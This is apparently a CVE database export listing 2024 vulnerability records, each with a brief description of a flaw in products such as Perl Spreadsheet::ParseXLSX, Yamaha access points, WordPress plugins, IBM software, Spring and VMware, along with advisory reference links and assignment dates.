CVE    2024    22368    Candidate    The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells.    FEDORA:FEDORA-2024-5f136f5d10   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WNJVC4C5C5V44DNOZ5BHVU53CDXPB2OJ/   |   FEDORA:FEDORA-2024-fa14bfd3b5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6R7NYWVVZYDZIQC5YEXNHZM6VEE26SJV/   |   MISC:https://github.com/haile01/perl_spreadsheet_excel_rce_poc/blob/main/parse_xlsx_bomb.md   |   MISC:https://metacpan.org/dist/Spreadsheet-ParseXLSX/changes   |   MLIST:[debian-lts-announce] 20240127 [SECURITY] [DLA 3723-1] libspreadsheet-parsexlsx-perl security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00018.html   |   MLIST:[oss-security] 20240110 CVE-2024-22368: Spreadsheet::ParseXLSX for Perl is vulnerable to DoS via out-of-memory bugs   |   URL:http://www.openwall.com/lists/oss-security/2024/01/10/2    Assigned (20240109)
CVE    2024    22366    Candidate    Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier.    MISC:http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/JVNVU99896362.html   |   URL:http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/JVNVU99896362.html   |   MISC:https://jvn.jp/en/vu/JVNVU99896362/   |   URL:https://jvn.jp/en/vu/JVNVU99896362/    Assigned (20240109)
CVE    2024    22365    Candidate    linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.    MISC:http://www.openwall.com/lists/oss-security/2024/01/18/3   |   MISC:https://github.com/linux-pam/linux-pam   |   MISC:https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb   |   MISC:https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0    Assigned (20240109)
CVE    2024    22362    Candidate    Drupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.    MISC:https://github.com/drupal/drupal   |   URL:https://github.com/drupal/drupal   |   MISC:https://jvn.jp/en/jp/JVN63383723/   |   URL:https://jvn.jp/en/jp/JVN63383723/   |   MISC:https://www.drupal.org/   |   URL:https://www.drupal.org/   |   MISC:https://www.drupal.org/about/core/policies/core-release-cycles/schedule   |   URL:https://www.drupal.org/about/core/policies/core-release-cycles/schedule    Assigned (20240109)
CVE    2024    22361    Candidate    IBM Semeru Runtime 8.0.302.0 through 8.0.392.0, 11.0.12.0 through 11.0.21.0, 17.0.1.0 - 17.0.9.0, and 21.0.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 281222.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281222   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281222   |   MISC:https://www.ibm.com/support/pages/node/7116431   |   URL:https://www.ibm.com/support/pages/node/7116431    Assigned (20240108)
CVE    2024    2236    Candidate    A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.    MISC:RHBZ#2268268   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2268268   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2236   |   URL:https://access.redhat.com/security/cve/CVE-2024-2236    Assigned (20240306)
CVE    2024    22355    Candidate    IBM QRadar Suite Products 1.10.12.0 through 1.10.18.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 280781.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280781   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280781   |   MISC:https://www.ibm.com/support/pages/node/7129328   |   URL:https://www.ibm.com/support/pages/node/7129328    Assigned (20240108)
CVE    2024    22352    Candidate    IBM InfoSphere Information Server 11.7 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 280361.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280361   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280361   |   MISC:https://www.ibm.com/support/pages/node/7117184   |   URL:https://www.ibm.com/support/pages/node/7117184    Assigned (20240108)
CVE    2024    22346    Candidate    Db2 for IBM i 7.2, 7.3, 7.4, and 7.5 infrastructure could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause user-controlled code to run with administrator privilege. IBM X-Force ID: 280203.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/280203   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/280203   |   MISC:https://www.ibm.com/support/pages/node/7140499   |   URL:https://www.ibm.com/support/pages/node/7140499    Assigned (20240108)
CVE    2024    22337    Candidate    IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279977.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279977   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279977   |   MISC:https://www.ibm.com/support/pages/node/7118642   |   URL:https://www.ibm.com/support/pages/node/7118642    Assigned (20240108)
CVE    2024    22336    Candidate    IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279976.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279976   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279976   |   MISC:https://www.ibm.com/support/pages/node/7118642   |   URL:https://www.ibm.com/support/pages/node/7118642    Assigned (20240108)
CVE    2024    22335    Candidate    IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279975.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279975   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279975   |   MISC:https://www.ibm.com/support/pages/node/7118642   |   URL:https://www.ibm.com/support/pages/node/7118642    Assigned (20240108)
CVE    2024    22332    Candidate    The IBM Integration Bus for z/OS 10.1 through 10.1.0.2 AdminAPI is vulnerable to a denial of service due to file system exhaustion. IBM X-Force ID: 279972.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279972   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279972   |   MISC:https://https://www.ibm.com/support/pages/node/7116046   |   URL:https://https://www.ibm.com/support/pages/node/7116046    Assigned (20240108)
CVE    2024    22331    Candidate    IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.19, 7.1 through 7.1.2.15, 7.2 through 7.2.3.8, 7.3 through 7.3.2.3, and IBM UrbanCode Deploy (UCD) - IBM DevOps Deploy 8.0.0.0 could disclose sensitive user information when installing the Windows agent. IBM X-Force ID: 279971.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279971   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279971   |   MISC:https://www.ibm.com/support/pages/node/7114131   |   URL:https://www.ibm.com/support/pages/node/7114131    Assigned (20240108)
CVE    2024    22320    Candidate    IBM Operational Decision Manager 8.10.3 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279146   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279146   |   MISC:https://www.ibm.com/support/pages/node/7112382   |   URL:https://www.ibm.com/support/pages/node/7112382    Assigned (20240108)
CVE    2024    22319    Candidate    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, 8.11.1 and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279145   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279145   |   MISC:https://www.ibm.com/support/pages/node/7112382   |   URL:https://www.ibm.com/support/pages/node/7112382    Assigned (20240108)
CVE    2024    22318    Candidate    IBM i Access Client Solutions (ACS) 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 is vulnerable to NT LAN Manager (NTLM) hash disclosure by an attacker modifying UNC capable paths within ACS configuration files to point to a hostile server. If NTLM is enabled, the Windows operating system will try to authenticate using the current user's session. The hostile server could capture the NTLM hash information to obtain the user's credentials. IBM X-Force ID: 279091.    FULLDISC:20240213 IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318   |   URL:http://seclists.org/fulldisclosure/2024/Feb/7   |   MISC:http://packetstormsecurity.com/files/177069/IBM-i-Access-Client-Solutions-Remote-Credential-Theft.html   |   MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279091   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279091   |   MISC:https://www.ibm.com/support/pages/node/7116091   |   URL:https://www.ibm.com/support/pages/node/7116091    Assigned (20240108)
CVE    2024    22317    Candidate    IBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/279143   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/279143   |   MISC:https://www.ibm.com/support/pages/node/7108661   |   URL:https://www.ibm.com/support/pages/node/7108661    Assigned (20240108)
CVE    2024    22313    Candidate    IBM Storage Defender - Resiliency Service 2.0 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 278749.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/278749   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/278749   |   MISC:https://www.ibm.com/support/pages/node/7115261   |   URL:https://www.ibm.com/support/pages/node/7115261    Assigned (20240108)
CVE    2024    22312    Candidate    IBM Storage Defender - Resiliency Service 2.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 278748.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/278748   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/278748   |   MISC:https://www.ibm.com/support/pages/node/7115261   |   URL:https://www.ibm.com/support/pages/node/7115261    Assigned (20240108)
CVE    2024    22310    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.7.    MISC:https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22309    Candidate    Deserialization of Untrusted Data vulnerability in QuantumCloud ChatBot with AI. This issue affects ChatBot with AI: from n/a through 5.1.0.    MISC:https://patchstack.com/database/vulnerability/chatbot/wordpress-ai-chatbot-plugin-5-1-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/chatbot/wordpress-ai-chatbot-plugin-5-1-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22308    Candidate    URL Redirection to Untrusted Site ('Open Redirect') vulnerability in smp7, wp.Insider Simple Membership. This issue affects Simple Membership: from n/a through 4.4.1.    MISC:https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-4-1-open-redirection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-4-1-open-redirection-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22307    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS. This issue affects WP-Lister Lite for eBay: from n/a through 3.5.7.    MISC:https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-lister-for-ebay/wordpress-wp-lister-lite-for-ebay-plugin-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22306    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Stored XSS. This issue affects Mang Board WP: from n/a through 1.7.7.    MISC:https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22305    Candidate    Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress – Kali Forms. This issue affects Contact Form builder with drag & drop for WordPress – Kali Forms: from n/a through 2.3.36.    MISC:https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22304    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress. This issue affects FreshMail For WordPress: from n/a through 2.3.2.    MISC:https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22302    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ignazio Scimone Albo Pretorio On line allows Stored XSS. This issue affects Albo Pretorio On line: from n/a through 4.6.6.    MISC:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22301    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line. This issue affects Albo Pretorio On line: from n/a through 4.6.6.    MISC:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22297    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr CBX Map for Google Map & OpenStreetMap allows Stored XSS. This issue affects CBX Map for Google Map & OpenStreetMap: from n/a through 1.1.11.    MISC:https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve    Assigned (20240108)
CVE    2024    22295    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RoboSoft Photo Gallery, Images, Slider in Rbs Image Gallery allows Stored XSS. This issue affects Photo Gallery, Images, Slider in Rbs Image Gallery: from n/a through 3.2.17.    MISC:https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22294    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker. This issue affects IP2Location Country Blocker: from n/a through 2.33.3.    MISC:https://patchstack.com/database/vulnerability/ip2location-country-blocker/wordpress-ip2location-country-blocker-plugin-2-33-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ip2location-country-blocker/wordpress-ip2location-country-blocker-plugin-2-33-3-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22293    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andrea Tarantini BP Profile Search allows Reflected XSS. This issue affects BP Profile Search: from n/a through 5.5.    MISC:https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22292    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS. This issue affects WP To Do: from n/a through 1.2.8.    MISC:https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22291    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi Browser Theme Color. This issue affects Browser Theme Color: from n/a through 1.3.    MISC:https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22290    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS). This issue affects Custom Dashboard Widgets: from n/a through 1.3.1.    MISC:https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    2229    Candidate    CWE-502: Deserialization of Untrusted Data vulnerability exists that could cause remote code execution when a malicious project file is loaded into the application by a valid user.    MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-02.pdf   |   URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-02.pdf    Assigned (20240306)
CVE    2024    22289    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cybernetikz Post views Stats allows Reflected XSS. This issue affects Post views Stats: from n/a through 1.3.    MISC:https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22287    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Luděk Melichar Better Anchor Links allows Cross-Site Scripting (XSS). This issue affects Better Anchor Links: from n/a through 1.7.5.    MISC:https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22286    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aluka BA Plus – Before & After Image Slider FREE allows Reflected XSS. This issue affects BA Plus – Before & After Image Slider FREE: from n/a through 1.0.3.    MISC:https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ba-plus-before-after-image-slider-free/wordpress-ba-plus-plugin-1-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22285    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Elise Bosse Frontpage Manager. This issue affects Frontpage Manager: from n/a through 1.3.    MISC:https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22284    Candidate    Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum. This issue affects Asgaros Forum: from n/a through 2.7.2.    MISC:https://patchstack.com/database/vulnerability/asgaros-forum/wordpress-asgaros-forum-plugin-2-7-2-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/asgaros-forum/wordpress-asgaros-forum-plugin-2-7-2-php-object-injection-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22283    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Delhivery Delhivery Logistics Courier. This issue affects Delhivery Logistics Courier: from n/a through 1.0.107.    MISC:https://patchstack.com/database/vulnerability/delhivery-logistics-courier/wordpress-delhivery-logistics-courier-plugin-1-0-107-subscriber-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/delhivery-logistics-courier/wordpress-delhivery-logistics-courier-plugin-1-0-107-subscriber-sql-injection-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    22282    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Torbert SimpleMap Store Locator allows Reflected XSS. This issue affects SimpleMap Store Locator: from n/a through 2.6.1.    MISC:https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240108)
CVE    2024    2228    Candidate    This vulnerability allows an authenticated user to perform a Lifecycle Manager flow or other QuickLink for a target user outside of the defined QuickLink Population.    MISC:https://www.sailpoint.com/security-advisories/   |   URL:https://www.sailpoint.com/security-advisories/    Assigned (20240306)
CVE    2024    2227    Candidate    This vulnerability allows access to arbitrary files in the application server file system due to a path traversal vulnerability in JavaServer Faces (JSF) 2.2.20 documented in CVE-2020-6950. The remediation for this vulnerability contained in this security fix provides additional changes to the remediation announced in May 2021 tracked by ETN IIQSAW-3585 and January 2024 tracked by IIQFW-336. This vulnerability in IdentityIQ is assigned CVE-2024-2227.    MISC:https://www.sailpoint.com/security-advisories/   |   URL:https://www.sailpoint.com/security-advisories/    Assigned (20240306)
CVE    2024    22259    Candidate    Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect https://cwe.mitre.org/data/definitions/601.html attack or to an SSRF attack if the URL is used after passing validation checks. This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input.    MISC:https://spring.io/security/cve-2024-22259   |   URL:https://spring.io/security/cve-2024-22259    Assigned (20240108)
CVE    2024    22258    Candidate    Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients. Specifically, an application is vulnerable when a Confidential Client uses PKCE for the Authorization Code Grant. An application is not vulnerable when a Public Client uses PKCE for the Authorization Code Grant.    MISC:https://spring.io/security/cve-2024-22258   |   URL:https://spring.io/security/cve-2024-22258    Assigned (20240108)
CVE    2024    22257    Candidate    In Spring Security, versions 5.7.x prior to 5.7.12, 5.8.x prior to 5.8.11, versions 6.0.x prior to 6.0.9, versions 6.1.x prior to 6.1.8, versions 6.2.x prior to 6.2.3, an application is possibly vulnerable to broken access control when it directly uses the AuthenticatedVoter#vote passing a null Authentication parameter.    MISC:https://spring.io/security/cve-2024-22257   |   URL:https://spring.io/security/cve-2024-22257    Assigned (20240108)
CVE    2024    22256    Candidate    VMware Cloud Director contains a partial information disclosure vulnerability. A malicious actor can potentially gather information about organization names based on the behavior of the instance.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0007.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0007.html    Assigned (20240108)
CVE    2024    22255    Candidate    VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability in the UHCI USB controller. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html    Assigned (20240108)
CVE    2024    22254    Candidate    VMware ESXi contains an out-of-bounds write vulnerability. A malicious actor with privileges within the VMX process may trigger an out-of-bounds write leading to an escape of the sandbox.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html    Assigned (20240108)
CVE    2024    22253    Candidate    VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html    Assigned (20240108)
CVE    2024    22252    Candidate    VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html    Assigned (20240108)
CVE    2024    22251    Candidate    VMware Workstation and Fusion contain an out-of-bounds read vulnerability in the USB CCID (chip card interface device). A malicious actor with local administrative privileges on a virtual machine may trigger an out-of-bounds read leading to information disclosure.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0005.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0005.html    Assigned (20240108)
CVE    2024    22250    Candidate    Session Hijack vulnerability in the deprecated VMware Enhanced Authentication Plug-in could allow a malicious actor with unprivileged local access to a Windows operating system to hijack a privileged EAP session when initiated by a privileged domain user on the same system.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0003.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0003.html    Assigned (20240108)
CVE    2024    22245    Candidate    Arbitrary Authentication Relay and Session Hijack vulnerabilities in the deprecated VMware Enhanced Authentication Plug-in (EAP) could allow a malicious actor that could trick a target domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs).    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0003.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0003.html    Assigned (20240108)
CVE    2024    22243    Candidate    Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect https://cwe.mitre.org/data/definitions/601.html attack or to an SSRF attack if the URL is used after passing validation checks.    MISC:https://spring.io/security/cve-2024-22243   |   URL:https://spring.io/security/cve-2024-22243    Assigned (20240108)
